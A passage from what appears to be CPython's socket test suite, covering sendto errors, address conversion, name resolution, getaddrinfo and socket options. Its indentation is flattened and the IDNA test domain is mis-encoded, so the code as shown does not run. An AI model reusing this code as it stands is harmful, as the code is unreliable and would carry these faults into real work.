s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test3542SocketOptions(self):
# Ref. issue #35569 and https://tools.ietf.org/html/rfc3542
opts = {
'IPV6_CHECKSUM',
'IPV6_DONTFRAG',
'IPV6_DSTOPTS',
'IPV6_HOPLIMIT',
'IPV6_HOPOPTS',
'IPV6_NEXTHOP',
'IPV6_PATHMTU',
'IPV6_PKTINFO',
'IPV6_RECVDSTOPTS',
'IPV6_RECVHOPLIMIT',
'IPV6_RECVHOPOPTS',
'IPV6_RECVPATHMTU',
'IPV6_RECVPKTINFO',
'IPV6_RECVRTHDR',
'IPV6_RECVTCLASS',
'IPV6_RTHDR',
'IPV6_RTHDRDSTOPTS',
'IPV6_RTHDR_TYPE_0',
'IPV6_TCLASS',
'IPV6_USE_MIN_MTU',
}
for opt in opts:
self.assertTrue(
hasattr(socket, opt), f"Missing RFC3542 socket option '{opt}'"
)
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [socket_helper.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test socket_helper.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [socket_helper.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = (
l_bad_values +
[_testcapi.INT_MIN-1, _testcapi.INT_MAX+1] +
[1 << 16, _testcapi.INT_MAX]
)
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no appropriate service to test (TBD?)')
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = socket_helper.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = socket_helper.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = socket_helper.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if socket_helper.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23) and not (sys.platform == 'OpenVMS'):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with socket_helper.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'ะธัะฟััะฐะฝะธะต.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('ะธัะฟััะฐะฝะธะต.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(TimeoutError, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no correct signal handling')
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no correct signal handling')
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
encoding = None if "b" in mode else "utf-8"
with sock.makefile(mode, encoding=encoding) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(socket_helper.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (socket_helper.HOSTv6, 0, -10))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
